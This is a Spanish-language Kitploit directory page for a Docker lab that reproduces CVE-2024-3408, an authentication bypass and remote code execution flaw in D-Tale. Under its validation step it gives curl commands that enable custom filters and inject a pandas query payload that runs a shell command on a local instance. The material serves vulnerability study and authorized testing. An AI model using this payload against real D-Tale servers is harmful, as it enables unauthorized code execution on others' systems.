Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-3408-dtale — Laboratorio de vulnerabilidades para CVE-2024-3408 - Bypass de autenticación y RCE en D-Tale | Kitploit
Herramientas/GitHubGitHub/flame-11/cve-2024-3408-dtale
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubflame-11/cve-2024-3408-dtale

CVE-2024-3408-dtale

Laboratorio de vulnerabilidades para CVE-2024-3408 - Bypass de autenticación y RCE en D-Tale

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-3408 - Omisión de autenticación y RCE en D-Tale

Entorno de laboratorio reproducible para CVE-2024-3408, una vulnerabilidad de omisión de autenticación y ejecución remota de código en D-Tale.

Vulnerabilidad

Las versiones de D-Tale hasta la 3.15.1 son vulnerables debido a:

  1. SECRET_KEY hardcodeado ("Dtale") para el firmado de sesiones Flask - permite la falsificación de cookies de sesión
  2. Ejecución de código mediante filtros personalizados - el endpoint test-filter utiliza pandas query que puede ser abusado para ejecutar código Python arbitrario

CVSS: 9.8 (Crítico)
Afectadas: D-Tale <= 3.15.1

Inicio rápido

root@kitploit:~
docker compose up -d --build

D-Tale estará disponible en http://localhost:40000

Validar

root@kitploit:~
# Paso 1: Habilitar filtros personalizados
curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D"
# Esperado: {"success":true}

# Paso 2: Ejecutar comando mediante inyección de consulta pandas
curl -s -G "http://localhost:40000/dtale/test-filter/1" \
  --data-urlencode "[email protected].__import__('os').popen('id').read()"
# Esperado: La respuesta contiene "uid=" y "gid=" (salida del comando en el mensaje de error)

Limpieza

root@kitploit:~
docker compose down

Referencias

  • Informe de Huntr (CVE-2024-3408)
  • Informe de Huntr (CVE-2025-0655)
  • NVD
  • D-Tale GitHub

Descargo de responsabilidad

Este laboratorio es solo con fines educativos y de pruebas de seguridad autorizadas. No lo utilices contra sistemas que no poseas o para los que no tengas permiso de prueba.

Descargar herramienta